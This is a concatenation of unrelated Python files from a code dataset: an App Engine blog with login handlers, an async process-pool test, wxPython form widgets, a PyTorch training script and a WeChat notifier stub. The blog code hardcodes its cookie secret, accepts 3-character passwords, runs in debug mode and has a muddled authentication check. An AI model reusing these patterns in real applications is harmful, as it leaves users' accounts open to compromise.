###############\nCOOKIE_SECRET = \"ASLDGKANDFKJAZNHARLFKASDLF\"\n\nEMAIL_RE = re.compile(r\"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)\")\nUSER_RE = re.compile(r\"^[a-zA-Z0-9_-]{3,20}$\")\nPASS_RE = re.compile(r\"^.{3,20}$\")\n\nclass UserSignUp(BlogHandler):\n\n def valid_username(self, username):\n return username and USER_RE.match(username)\n\n def user_exists(self, username):\n\n username_exists = db.GqlQuery(\"SELECT * \"\n \"FROM User \"\n \"WHERE username = :usernm\",\n usernm=username).get()\n return username_exists\n\n def valid_password(self, password):\n return password and PASS_RE.match(password)\n\n def valid_email(self, email):\n return not email or EMAIL_RE.match(email)\n\n def get(self):\n self.render(\"signup.html\")\n\n def post(self):\n\n have_error = False\n username = self.request.get('username')\n password = self.request.get('password')\n verify = self.request.get('verify')\n email = self.request.get('email')\n\n params = dict(username=username, email=email)\n\n if self.user_exists(username):\n params['error_username_exists'] = 'User already Exists'\n have_error = True\n elif not self.valid_username(username):\n params['error_username'] = \"that's not a valid User ID\"\n have_error = True\n\n if not self.valid_password(password):\n params['error_password'] = \"that's not a valid Password\"\n have_error = True\n elif password != verify:\n params['error_verify'] = 'The Passwords do not Match'\n have_error = True\n\n if not self.valid_email(email):\n params['error_email'] = \"That's not a valid Email\"\n have_error = True\n\n if have_error:\n self.render(\"signup.html\", **params)\n else:\n hashed_pass = self.hash_pass(username, password)\n user = 
User(parent=user_key(),\n username=username,\n pass_hash=hashed_pass,\n email=email)\n user.put()\n user_id = str(user.key().id())\n self.set_secure_cookie('usercookie', user_id, None)\n self.redirect('/welcome')\n\n################ USER LOGIN HANDLER ################\n\nclass UserLogin(BlogHandler):\n\n def get(self):\n self.render(\"login.html\")\n\n def post(self):\n auth_error = True\n username = self.request.get('username')\n password = self.request.get('password')\n\n params = dict(username=username)\n\n if self.user_exists(username):\n auth_error = False\n\n if self.user_auth(username, password):\n auth_error = False\n else:\n auth_error = True\n params['error_password'] = 'Invalid Password'\n else:\n auth_error = True\n params['error_username'] = 'User Does Not Exist'\n\n if auth_error:\n self.render(\"login.html\", **params)\n else:\n user = db.GqlQuery(\"SELECT * \"\n \"FROM User \"\n \"WHERE username = :usernm\",\n usernm=username).get()\n user_id = str(user.key().id())\n self.set_secure_cookie('usercookie', user_id, None)\n self.redirect('/welcome')\n\n################# USERS LOGOUT ######################\n\nclass UserLogout(BlogHandler):\n\n def get(self):\n self.set_secure_cookie('usercookie', '', -1)\n self.redirect('/signup')\n\n################# MAIN PAGE ####################\n\nclass Blog(BlogHandler):\n\n def get(self):\n\n posts = db.GqlQuery(\"SELECT * \"\n \"FROM Post \"\n \"ORDER BY created DESC LIMIT 10\")\n self.render(\"front.html\", posts=posts)\n\n def post(self):\n\n auth_error = True\n if self.read_secure_cookie('usercookie'):\n auth_error = False\n else:\n auth_error = True\n username = self.read_secure_cookie('usercookie')\n if not self.user_exists(username):\n auth_error = False\n else:\n auth_error = True\n\n if not auth_error:\n edit_post_id = self.request.get('edit_post_id')\n comment_post_id = self.request.get('comment_post_id')\n like_post_id = self.request.get('like_post_id')\n if comment_post_id:\n post_id = comment_post_id\n self.redirect('/newcomment?post_id=' + post_id)\n if edit_post_id:\n post_id = edit_post_id\n self.redirect('/editpost?post_id=' + post_id)\n if like_post_id:\n post_id = like_post_id\n user_id = self.read_secure_cookie('usercookie')\n if not like_dup('PostLike', user_id, post_id):\n like = PostLike(like_user_id=user_id,\n parent=post_key(post_id))\n like.put()\n self.redirect('/')\n else:\n self.redirect('/signup')\n\nclass Welcome(BlogHandler):\n def get(self):\n if self.read_secure_cookie('usercookie'):\n user_id = self.read_secure_cookie('usercookie')\n key = db.Key.from_path('User',\n int(user_id),\n parent=user_key())\n\n user = db.get(key)\n\n self.render(\"welcome.html\",\n username=user.username)\n else:\n self.redirect('/signup')\n\napp = webapp2.WSGIApplication([('/?', Blog),\n ('/post-([0-9]+)', PostLink),\n ('/comment-([0-9]+)', CommentLink),\n ('/newpost', NewPost),\n ('/newcomment', NewComment),\n ('/signup', UserSignUp),\n ('/editpost', EditPost),\n ('/editcomment', EditComment),\n ('/login', UserLogin),\n ('/logout', UserLogout),\n ('/deletepost', DeletePost),\n ('/deletecomment', DeleteComment),\n ('/welcome', Welcome)\n ], debug=True)\n","sub_path":"blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":27611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"228072609","text":"import asyncio\nimport os\nimport signal\nfrom time import sleep, time\n\nimport pytest\n\nimport aiomisc\nfrom aiomisc.process_pool import 
ProcessPoolExecutor\n\n\n@pytest.fixture\ndef pool():\n pool = ProcessPoolExecutor(4)\n try:\n yield pool\n finally:\n pool.shutdown(True)\n\n\n@aiomisc.timeout(10)\nasync def test_simple(pool, loop, timer):\n current_time = await loop.run_in_executor(pool, time)\n assert current_time > 0\n\n with timer(1):\n await asyncio.wait_for(\n asyncio.gather(\n *[\n loop.run_in_executor(pool, sleep, 1) for _ in range(4)\n ]\n ), timeout=2,\n )\n\n\n@aiomisc.timeout(10)\nasync def test_exception(pool, loop):\n with pytest.raises(ZeroDivisionError):\n await loop.run_in_executor(pool, divmod, 1, 0)\n\n\ndef suicide():\n os.kill(os.getpid(), signal.SIGINT)\n\n\n@pytest.mark.skip(reason=\"Stuck tests in GH actions\")\n@aiomisc.timeout(10)\nasync def test_exit(pool, loop):\n with pytest.raises(asyncio.TimeoutError):\n await asyncio.wait_for(\n asyncio.gather(\n *[loop.run_in_executor(pool, suicide) for _ in range(4)]\n ), timeout=2,\n )\n","sub_path":"tests/test_process_pool.py","file_name":"test_process_pool.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"220488840","text":"# -*- coding: utf8 -*-\n\n\"\"\"Quickreport\n\nThe widgets corresponding to the various possible parameter types.\nWhen a type is specified for a parameter in .params.py, what gets\ndisplayed in the GUI is the corresponding widget defined here.\n\n==========================================\n:version: see quickreport.__version.py__\n:copyright: Riccardo Polignieri 2012\n:license: ISC\n\"\"\"\n\nimport wx\nimport wx.lib.masked as masked\nimport datetime\n\nfrom gui_utils import post_evt_param_changed, EVT_PARAM_CHANGED\n\n__all__ = ['text', 'integer', 'boolean', \n 'symple_list', 'droplist', \n 'currency',\n 'date', 'period', \n 'month', 'bimester', 'trimester', 'quadrimester', 'semester']\n\n\n# 'text' type input parameter =================================================\nclass TextWidget(wx.TextCtrl):\n def __init__(self, *a, **k):\n use_evt_char = k.pop('track_changes', False)\n wx.TextCtrl.__init__(self, *a, **k)\n self._val = ''\n evt = wx.EVT_CHAR if use_evt_char else wx.EVT_KILL_FOCUS\n self.Bind(evt, self.on_change)\n \n def on_change(self, evt):\n evt.Skip()\n val = self.GetValue() \n if val != self._val:\n self._val = val\n post_evt_param_changed(evt)\n \n def SetValue(self, val):\n self._val = val\n wx.TextCtrl.SetValue(self, val)\n \n def SetBounds(self, val): pass\n \ndef text(parent, track_changes=False): \n return TextWidget(parent, track_changes=track_changes)\n \n \n# 'integer' type input parameter ===============================================\nclass IntegerWidget(wx.SpinCtrl):\n def __init__(self, *a, **k):\n wx.SpinCtrl.__init__(self, *a, **k)\n self.Bind(wx.EVT_SPIN, post_evt_param_changed)\n \n def SetBounds(self, bounds): return wx.SpinCtrl.SetRange(self, *bounds)\n\ndef integer(parent): return IntegerWidget(parent)\n\n\n# 'boolean' type input parameter ===============================================\nclass BooleanWidget(wx.CheckBox):\n def __init__(self, *a, **k):\n wx.CheckBox.__init__(self, *a, **k)\n self.Bind(wx.EVT_CHECKBOX, post_evt_param_changed)\n \n def SetBounds(self, val): pass\n \ndef boolean(parent): return BooleanWidget(parent)\n\n\n# 'symple_list' type input parameter ===========================================\nclass SimpleListWidget(wx.ListBox):\n def __init__(self, *a, **k):\n self.multichoice = k.pop('multichoice')\n self.select_all = k.pop('select_all', '')\n if 
self.multichoice:\n k['style'] = wx.LB_EXTENDED\n else:\n self.select_all = '' # just in case of user's mistake\n wx.ListBox.__init__(self, *a, **k)\n funct = self.on_select if self.select_all else post_evt_param_changed\n self.Bind(wx.EVT_LISTBOX, funct)\n self._all_selected = False\n \n def on_select(self, evt): # used only in case of self.select_all\n if evt.GetSelection() == 0:\n for i in self.GetItems():\n self.SetStringSelection(i, (not self._all_selected))\n self._all_selected = not self._all_selected\n post_evt_param_changed(evt)\n \n def SetBounds(self, bounds):\n if self.select_all: \n bounds = [self.select_all] + list(bounds)\n self.SetItems(bounds)\n \n def SetValue(self, val):\n if val is None: \n self.SetSelection(-1)\n return\n if self.multichoice:\n strings = self.GetStrings()\n if val == 'all':\n val = strings\n elif val == 'none':\n val = []\n for v in strings:\n self.SetStringSelection(v, (v in val))\n else:\n self.SetStringSelection(val)\n \n def GetValue(self):\n if self.multichoice:\n if self.select_all: self.SetSelection(0, False)\n return [self.GetString(i) for i in self.GetSelections()]\n else:\n return self.GetStringSelection()\n\nclass TwoFieldsListWidget(wx.ListBox):\n def __init__(self, *a, **k):\n self.multichoice = k.pop('multichoice')\n self.select_all = k.pop('select_all', '')\n if self.multichoice:\n k['style'] = wx.LB_EXTENDED\n else:\n self.select_all = '' # just in case of user's mistake\n wx.ListBox.__init__(self, *a, **k)\n self.ids = []\n self._all_selected = False\n funct = self.on_select if self.select_all else post_evt_param_changed\n self.Bind(wx.EVT_LISTBOX, funct)\n \n def on_select(self, evt): # used only in case of self.select_all\n if evt.GetSelection() == 0:\n for i in self.GetItems():\n self.SetStringSelection(i, (not self._all_selected))\n self._all_selected = not self._all_selected\n post_evt_param_changed(evt)\n \n def SetBounds(self, bounds):\n if self.select_all: \n bounds = [[None, self.select_all]] + list(bounds)\n self.ids, items = zip(*bounds)\n self.SetItems(items)\n \n def SetValue(self, val):\n if not val: \n self.SetSelection(-1)\n return\n if self.multichoice:\n if val == 'all':\n val = self.ids\n elif val == 'none':\n val = []\n for n, v in enumerate(self.ids):\n self.SetSelection(n, (v in val))\n else:\n self.SetSelection(self.ids.index(val))\n \n def GetValue(self):\n if self.multichoice:\n if self.select_all: self.SetSelection(0, False)\n return [self.ids[i] for i in self.GetSelections()]\n else:\n return self.ids[self.GetSelection()]\n\nclass MultiChoiceListWidget(wx.CheckListBox):\n def __init__(self, *a, **k):\n self.use_id = k.pop('use_id')\n self.select_all = k.pop('select_all', '')\n wx.CheckListBox.__init__(self, *a, **k)\n if self.use_id:\n self.ids = []\n self.Bind(wx.EVT_CHECKLISTBOX, self._on_check)\n\n def _on_check(self, evt):\n item = evt.GetSelection()\n if self.select_all and (item == 0):\n check = self.IsChecked(0)\n for n, i in enumerate(self.GetItems()[1:]):\n self.Check(n+1, check)\n self.SetSelection(item)\n post_evt_param_changed(evt)\n \n def SetBounds(self, bounds):\n if self.use_id:\n if self.select_all:\n bounds = [[None, self.select_all]] + list(bounds)\n self.ids, items = zip(*bounds)\n self.SetItems(items)\n else:\n if self.select_all: \n bounds = [self.select_all] + list(bounds)\n self.SetItems(bounds)\n \n def SetValue(self, val):\n if not val: \n self.SetSelection(-1)\n return\n elif val == 'none':\n val = []\n if self.use_id:\n if val == 'all':\n val = self.ids\n for n, v in 
enumerate(self.ids):\n self.Check(n, (v in val))\n else:\n strings = self.GetStrings()\n if val == 'all':\n val = strings\n for n, v in enumerate(strings):\n self.Check(n, (v in val))\n \n def GetValue(self):\n if self.use_id:\n return [n+1 for n, i in enumerate(self.ids[1:]) if self.IsChecked(i)]\n else:\n res = list(self.GetCheckedStrings())\n try: res.remove(self.select_all)\n except ValueError: pass\n return res\n \ndef symple_list(parent, use_id=False, multichoice=False, select_all=False): \n if multichoice and wx.PlatformInfo[1] in ('wxMSW', 'wxGTK'):\n return MultiChoiceListWidget(parent, use_id=use_id, select_all=select_all)\n if use_id:\n return TwoFieldsListWidget(parent, multichoice=multichoice, select_all=select_all)\n else:\n return SimpleListWidget(parent, multichoice=multichoice, select_all=select_all)\n \n\n# 'droplist' type input parameter ==============================================\nclass DropDownListWidget(wx.ComboBox):\n def __init__(self, *a, **k):\n k['style'] = wx.CB_DROPDOWN|wx.CB_READONLY\n wx.ComboBox.__init__(self, *a, **k)\n self.Bind(wx.EVT_COMBOBOX, post_evt_param_changed)\n \n SetBounds = wx.ComboBox.SetItems\n \nclass TwoFieldsDropDownWidget(wx.ComboBox):\n def __init__(self, *a, **k):\n k['style'] = wx.CB_DROPDOWN|wx.CB_READONLY\n wx.ComboBox.__init__(self, *a, **k)\n self.ids = []\n self.Bind(wx.EVT_COMBOBOX, post_evt_param_changed)\n \n def SetBounds(self, bounds):\n self.ids = []\n self.Clear()\n for i in bounds:\n self.ids.append(i[0])\n self.Append(i[1])\n \n def SetValue(self, val):\n if val is None: \n wx.ComboBox.SetSelection(self, -1)\n return\n wx.ComboBox.SetSelection(self, self.ids.index(val))\n \n def GetValue(self):\n return self.ids[self.GetSelection()]\n\ndef droplist(parent, use_id=False): \n if use_id: return TwoFieldsDropDownWidget(parent)\n else: return DropDownListWidget(parent)\n\n\n# 'currency' type input parameter ==============================================\nEURO_CONVENTIONS = { # note: actually, conventions for euro adopted in _Italy_!\n 'mon_decimal_point': ',', 'int_frac_digits': 2, 'p_sep_by_space': 1, \n 'frac_digits': 2, 'thousands_sep': '.', 'n_sign_posn': 3, 'decimal_point': ',', \n 'int_curr_symbol': 'EUR', 'n_cs_precedes': 1, 'p_sign_posn': 3, \n 'mon_thousands_sep': '.', 'negative_sign': '-', 'currency_symbol': '\\x80', \n 'n_sep_by_space': 1, 'mon_grouping': [3, 0], 'p_cs_precedes': 1, \n 'positive_sign': '', 'grouping': [3, 0]}\nDOLLAR_CONVENTIONS = { # conventions for usd adopted in USA\n 'mon_decimal_point': '.', 'int_frac_digits': 2, 'p_sep_by_space': 0, \n 'frac_digits': 2, 'thousands_sep': ',', 'n_sign_posn': 0, 'decimal_point': '.', \n 'int_curr_symbol': 'USD', 'n_cs_precedes': 1, 'p_sign_posn': 3, \n 'mon_thousands_sep': ',', 'negative_sign': '-', 'currency_symbol': '$', \n 'n_sep_by_space': 0, 'mon_grouping': [3, 0], 'p_cs_precedes': 1, \n 'positive_sign': '', 'grouping': [3, 0]}\nPOUND_CONVENTIONS = { # conventions for pounds adopted in GB\n 'mon_decimal_point': '.', 'int_frac_digits': 2, 'p_sep_by_space': 0, \n 'frac_digits': 2, 'thousands_sep': ',', 'n_sign_posn': 3, 'decimal_point': '.', \n 'int_curr_symbol': 'GBP', 'n_cs_precedes': 1, 'p_sign_posn': 3, \n 'mon_thousands_sep': ',', 'negative_sign': '-', 'currency_symbol': '\\xa3', \n 'n_sep_by_space': 0, 'mon_grouping': [3, 0], 'p_cs_precedes': 1, \n 'positive_sign': '', 'grouping': [3, 0]}\n\nclass CurrencyWidget(wx.Panel):\n def __init__(self, *a, **k):\n use_decimal = k.pop('use_decimal')\n conv = k.pop('conventions')\n if conv == 'euro' : conv = 
EURO_CONVENTIONS\n elif conv == 'dollar': conv = DOLLAR_CONVENTIONS\n elif conv == 'pound' : conv = POUND_CONVENTIONS\n wx.Panel.__init__(self, *a, **k)\n \n self.currency = masked.NumCtrl(self, limited=True,\n fractionWidth = (conv['frac_digits'] if use_decimal else 0),\n groupDigits = (conv['mon_grouping'][0]>0),\n groupChar = conv['thousands_sep'],\n decimalChar = conv['decimal_point'],\n useParensForNegatives = (conv['n_sign_posn']==0))\n self.currency.Bind(masked.EVT_NUM, post_evt_param_changed)\n \n s = wx.BoxSizer()\n s.Add(wx.StaticText(self, -1, conv['currency_symbol']), 0, \n wx.ALIGN_CENTER_VERTICAL, 0)\n s.Add(self.currency, 1, wx.EXPAND|wx.ALL, 5)\n self.SetSizer(s)\n \n def SetBounds(self, bounds):\n # TODO disconnect event \n self.currency.SetMin(bounds[0])\n self.currency.SetMax(bounds[1])\n \n def SetValue(self, val):\n # TODO disconnect event\n self.currency.SetValue(val)\n \n def GetValue(self): \n return self.currency.GetValue()\n \ndef currency(parent, conventions='euro', use_decimal=True):\n return CurrencyWidget(parent, conventions=conventions, use_decimal=use_decimal)\n\n\n# 'date' type input parameter ==================================================\nclass DateWidget(wx.DatePickerCtrl):\n def __init__(self, *a, **k):\n wx.DatePickerCtrl.__init__(self, *a, **k)\n self._min = None\n self._max = None\n self.Bind(wx.EVT_DATE_CHANGED, self.on_changed)\n\n def on_changed(self, evt):\n if (self._min is not None) and (self.GetValue() < self._min): \n self.SetValue(self._min)\n elif (self._max is not None) and (self.GetValue() > self._max): \n self.SetValue(self._max)\n# post_evt_param_changed(evt)\n \n def SetBounds(self, bounds):\n if bounds is None: return \n self._min, self._max = bounds\n self.on_changed(None)\n \n def GetValue(self):\n y, m, d = map(int, \n wx.DatePickerCtrl.GetValue(self).FormatISODate().split('-'))\n return datetime.date(y, m, d)\n \n def SetValue(self, v):\n tt = v.timetuple()\n dmy = (tt[2], tt[1]-1, tt[0])\n wx.DatePickerCtrl.SetValue(self, wx.DateTimeFromDMY(*dmy))\n \ndef date(parent): return DateWidget(parent, style=wx.DP_DROPDOWN|wx.DP_SHOWCENTURY)\n\n\n# 'period' type input parameter ================================================\nclass PeriodWidget(wx.Panel):\n def __init__(self, *a, **k):\n wx.Panel.__init__(self, *a, **k)\n self.period_from = DateWidget(self, style=wx.DP_DROPDOWN|wx.DP_SHOWCENTURY)\n self.period_to = DateWidget(self, style=wx.DP_DROPDOWN|wx.DP_SHOWCENTURY)\n s = wx.FlexGridSizer(2, 2, 5, 5)\n s.AddGrowableCol(1)\n s.Add(wx.StaticText(self, -1, 'from'), 0, wx.ALIGN_CENTER_VERTICAL)\n s.Add(self.period_from, 1, wx.EXPAND|wx.ALL, 5)\n s.Add(wx.StaticText(self, -1, 'to'), 0, wx.ALIGN_CENTER_VERTICAL)\n s.Add(self.period_to, 1, wx.EXPAND|wx.ALL, 5)\n self.Bind(EVT_PARAM_CHANGED, self.on_date_changed)\n self.SetSizer(s)\n \n def on_date_changed(self, evt): \n if evt: evt.Skip()\n from_, to = self.GetValue()\n if from_ > to:\n self.SetValue((to, to))\n \n def SetBounds(self, bounds):\n if bounds is None: return\n self.period_from.SetBounds(bounds)\n self.period_to.SetBounds(bounds)\n \n def SetValue(self, val):\n self.period_from.SetValue(val[0])\n self.period_to.SetValue(val[1])\n\n def GetValue(self):\n return self.period_from.GetValue(), self.period_to.GetValue()\n \ndef period(parent): return PeriodWidget(parent)\n\n\n# 'fixed period family' type input parameters ==================================\nfrom math import ceil\nclass FixedPeriodWidget(wx.Panel):\n months = 'January February March April May June July August 
September October November December'.split()\n spans = ',, bimester, trimester, quadrimester,, semester'.split(',')\n def __init__(self, *a, **k):\n self.period = k.pop('period')\n wx.Panel.__init__(self, *a, **k)\n if self.period == 1:\n ch = self.months\n else:\n ch = [str(i)+self.spans[self.period] for i in range(1, (12/self.period)+1)]\n self.division = wx.ComboBox(self, -1, choices=ch, \n style=wx.CB_DROPDOWN|wx.CB_READONLY)\n self.year = wx.SpinCtrl(self, min=1800, max=2200, size=((80, -1)))\n s = wx.BoxSizer()\n s.Add(self.division, 1, wx.EXPAND|wx.RIGHT, 5)\n s.Add(self.year, 0, wx.FIXED_MINSIZE|wx.LEFT, 5)\n self.SetSizer(s)\n self.Bind(wx.EVT_COMBOBOX, self.on_changed, self.division)\n self.Bind(wx.EVT_SPINCTRL, self.on_changed, self.year)\n \n def on_changed(self, evt):\n evt.SetEventObject(self)\n post_evt_param_changed(evt)\n \n def GetValue(self):\n start = datetime.date(\n self.year.GetValue(), \n ((self.period * self.division.GetSelection()) + 1),\n 1)\n end = ((start + \n datetime.timedelta(days=(30*self.period)+15)).replace(day=1) - \n datetime.timedelta(days=1))\n return start, end\n \n def SetValue(self, val):\n self.year.SetValue(val.year)\n self.division.SetSelection(int(ceil(float(val.month)/self.period))-1)\n \n def SetBounds(self, bounds): \n if bounds is None: return\n try: min = bounds[0].year\n except AttributeError: min=None\n try: max = bounds[1].year\n except AttributeError: max=None\n self.year.SetRange(min, max)\n\n\ndef _fixed_period(period, parent): return FixedPeriodWidget(parent, period=period)\n\ndef month(parent): return _fixed_period(1, parent)\ndef bimester(parent): return _fixed_period(2, parent)\ndef trimester(parent): return _fixed_period(3, parent)\ndef quadrimester(parent): return _fixed_period(4, parent)\ndef semester(parent): return _fixed_period(6, parent)\n\n\n","sub_path":"quickreport/param_types.py","file_name":"param_types.py","file_ext":"py","file_size_in_byte":17240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"249356939","text":"import os\nimport time\nimport math\nimport logging\nimport datetime\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\nfrom src import dataset, models, utils\n\n\nlogger = logging.getLogger('main')\n\n\nargs = {\n 'exp_id': 'p1_baseline',\n 'model': 'baseline',\n\n 'test': False,\n 'resume': None,\n\n 'out_path': 'results',\n\n 'trainset': './canvas/social-checkin-prediction/train.csv',\n 'valset': './canvas/social-checkin-prediction/validation.csv',\n 'testset': './canvas/social-checkin-prediction/test.csv',\n 'data_workers': 1, \n 'map_size': (2915, 1982),\n \n 'epochs': 40,\n 'batch_size': 64,\n\n 'lr':0.01,\n 'lr_decay': 0.1,\n 'lr_steps': 0.25,\n\n 'loc_scale': 10,\n 'time_scale': 1, \n\n 'val_freq': 1, \n 'log_freq': 100,\n 'checkpoint_freq': 10,\n}\n\n\ndef main():\n logger.info('--- experiment: {0} ---\\n'.format(args['exp_id']))\n\n # prepare path\n args['out_path'] = \"{root}/{exp_id}/{date:%Y-%m-%d_%H:%M:%S}/\".format(\n root=args['out_path'], exp_id=args['exp_id'], date=datetime.datetime.now())\n logger.info('experiment folder: \\n {0} \\n'.format(args['out_path']))\n\n checkpoint_path = os.path.join(args['out_path'], 'ckpt')\n if not os.path.exists(checkpoint_path):\n os.makedirs(checkpoint_path)\n\n # handle multiply GPUs\n gpu_num = torch.cuda.device_count()\n logger.info('GPU: \\n total GPU(s): {0}'.format(gpu_num))\n if 
gpu_num < 1:\n logger.error(' no GPU be detected')\n\n args['lr'] *= gpu_num\n args['batch_size'] *= gpu_num\n args['data_workers'] *= gpu_num\n logger.info(' total learn rate: {0}\\n'\n ' total batch size: {1}\\n'\n ' total data workers: {2}\\n'\n .format(args['lr'], args['batch_size'], args['data_workers']))\n\n # create dataloader\n trainset = dataset.CheckInDataset(args['trainset'], map_size=args['map_size'])\n valset = dataset.CheckInDataset(args['valset'], map_size=args['map_size'])\n testset = dataset.CheckInDataset(args['testset'], map_size=args['map_size'])\n\n train_loader = torch.utils.data.DataLoader(trainset, batch_size=args['batch_size'], shuffle=True,\n num_workers=args['data_workers'], pin_memory=True, drop_last=True)\n val_loader = torch.utils.data.DataLoader(valset, batch_size=args['batch_size'], shuffle=False,\n num_workers=args['data_workers'], pin_memory=True)\n test_loader = torch.utils.data.DataLoader(testset, batch_size=args['batch_size'], shuffle=False,\n num_workers=args['data_workers'], pin_memory=True)\n\n # create network\n model = models.__dict__[args['model']]()\n model = nn.DataParallel(model)\n model = model.cuda()\n logger.info('model: \\n {0}\\n'.format(args['model']))\n logger.info(models.model_str(model))\n\n # create optimizer\n optimizer = optim.Adam(model.parameters(), lr=args['lr'])\n lr_scheduler = optim.lr_scheduler.StepLR(\n optimizer, step_size=int(args['lr_steps'] * args['epochs']), gamma=args['lr_decay'])\n\n # load state from checkpoint\n start_epoch = 0\n if args['resume'] is not None: \n logger.info('load checkpoint: ' + args['resume'])\n checkpoint = torch.load(args['resume'])\n start_epoch = checkpoint['epoch']\n model.load_state_dict(checkpoint['model'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])\n\n if args['test']:\n logger.info('--- start to test model ---')\n test(model, test_loader, 0)\n return\n\n # main training loop\n for epoch in range(start_epoch, args['epochs']):\n logger.info('--- start to train epoch: {0} ---'.format(epoch))\n timer = time.time()\n\n train(model, train_loader, optimizer, epoch)\n\n if epoch % args['val_freq'] == 0:\n logger.info('--- start to test epoch: {0} ---'.format(epoch))\n test(model, test_loader, epoch)\n\n if epoch % args['checkpoint_freq'] == 0:\n state = {\n 'epoch': epoch + 1,\n 'model': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'lr_scheduler': lr_scheduler.state_dict()\n }\n\n state_file = os.path.join(checkpoint_path, 'checkpoint.{0}.ckpt'.format(epoch))\n logger.info(\"--- checkpoint saved to %s ---\" % state_file)\n torch.save(state, state_file)\n\n lr_scheduler.step()\n logger.info('--- epoch in {} seconds ---\\n'.format(time.time() - timer))\n\n\ndef train(model, train_loader, optimizer, epoch):\n meters = utils.AverageMeterSet()\n\n mse_loss = nn.MSELoss()\n\n model.train()\n for idx, (user_id, in_data, gt_data) in enumerate(train_loader):\n timer = time.time()\n optimizer.zero_grad()\n \n user_id = Variable(user_id).cuda()\n in_data = Variable(in_data).cuda()\n gt_data = Variable(gt_data).cuda()\n \n pred_loc, pred_time = model.forward(in_data)\n\n gt_loc = gt_data[:, 0:2]\n gt_time = gt_data[:, 2:]\n\n loc_loss = args['loc_scale'] * mse_loss(pred_loc, gt_loc)\n time_loss = args['time_scale'] * mse_loss(pred_time, gt_time)\n meters.update('loc_loss', loc_loss.data)\n meters.update('time_loss', time_loss.data)\n\n loss = loc_loss + time_loss\n loss.backward()\n optimizer.step()\n\n 
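# Editorial aside (not in the original script): with DataParallel over\n # several GPUs and a learning rate scaled by gpu_num, exploding gradients\n # are a common failure mode; a minimal, hypothetical guard would clip\n # right before the optimizer.step() call above, e.g.:\n #\n # torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=5.0)\n #\n # (max_norm=5.0 is an assumed value, not taken from this project.)\n 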
meters.update('batch_time', time.time() - timer)\n if idx % args['log_freq'] == 0:\n logger.info('step: [{0}][{1}/{2}]\\t'\n 'loc_loss: {meters[loc_loss]:.4f}\\t'\n 'time_loss: {meters[time_loss]:.4f}\\t'\n .format(epoch, idx, len(train_loader), meters=meters))\n\n\ndef test(model, val_loader, epoch):\n\n \"\"\"\n Takes the entire batch of results and computes the SAD\n \"\"\"\n def getSAD(vec1, vec2):\n return torch.mean(torch.abs(vec1.data - vec2.data))\n\n meters = utils.AverageMeterSet()\n\n model.eval()\n for idx, (user_id, in_data, gt_data) in enumerate(val_loader):\n timer = time.time()\n\n user_id = Variable(user_id).cuda()\n in_data = Variable(in_data).cuda()\n gt_data = Variable(gt_data).cuda()\n\n pred_loc, pred_time = model.forward(in_data)\n\n gt_loc = gt_data[:, 0:2]\n gt_time = gt_data[:, 2:]\n\n loc_l1 = getSAD(pred_loc, gt_loc)\n time_l1 = getSAD(pred_time, gt_time)\n \n meters.update('loc_l1', loc_l1)\n meters.update('time_l1', time_l1)\n\n meters.update('batch_time', time.time() - timer)\n if idx % args['log_freq'] == 0:\n logger.info('step: [{0}][{1}/{2}]\\t'\n 'loc_l1: {meters[loc_l1]:.4f}\\t'\n 'time_l1: {meters[time_l1]:.4f}\\t'\n .format(epoch, idx, len(val_loader), meters=meters))\n\n logger.info('--- finish test ---\\n'\n 'loc_l1: {meters[loc_l1]:.4f}\\t'\n 'time_l1: {meters[time_l1]:.4f}\\t'\n .format(epoch, idx, len(val_loader), meters=meters))\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO, format='%(message)s')\n \n main()","sub_path":"assignment2/scripts/p1_baseline.py","file_name":"p1_baseline.py","file_ext":"py","file_size_in_byte":7380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"444309262","text":"from wxpy import *\nfrom configparser import ConfigParser\nfrom General import General\nfrom tkinter import Tk\nfrom tkinter.messagebox import showinfo\nimport threading\nimport pyaudio\nimport wave\n\ncfg = General.get_config()[0]\n\ndef continuous_output(text):\n print(text)\n\ndef final_output(text):\n from_ = cfg.get('Notify', 'Mail_from')\n pwd = cfg.get('Notify', 'Password')\n to = cfg.get('Notify', 'Mail_to')\n mail = Mail(from_, pwd, to)\n\ndef play_audio(filename):\n CHUNK = 1024\n wf = wave.open(filename, 'rb')\n p = pyaudio.PyAudio()\n stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\n channels=wf.getnchannels(),\n rate=wf.getframerate(),\n output=True)\n data = wf.readframes(CHUNK)\n while data != b'':\n stream.write(data)\n data = wf.readframes(CHUNK)\n stream.stop_stream()\n stream.close()\n p.terminate()\n\ndef play_audio_async(filename):\n do_thread = threading.Thread(target=play_audio, args=[filename])\n do_thread.start()\n\ndef show_messagebox(text):\n root = Tk()\n root.withdraw()\n showinfo(message=text)\n root.destroy()\n\ndef show_messagebox_async(text):\n do_thread = threading.Thread(target=show_messagebox, args=[text])\n do_thread.start()\n\nclass Robot:\n def __init__(self):\n self.cfg = ConfigParser()\n self.cfg.read('.config.ini', encoding='utf8')\n try:\n self.bot = Bot(cache_path=True, console_qr=2)\n except Exception:\n print('This account has been blacklisted and cannot log in!')\n\n # @self.bot.register(my_friend)\n def reply_my_friend(msg):\n return 'received: {} ({})'.format(msg.text, msg.type)\n\n\nclass Mail:\n def __init__(self, from_, psw, to):\n pass\n\n\nif __name__ == '__main__':\n a = 
Robot()\n","sub_path":"Notify.py","file_name":"Notify.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
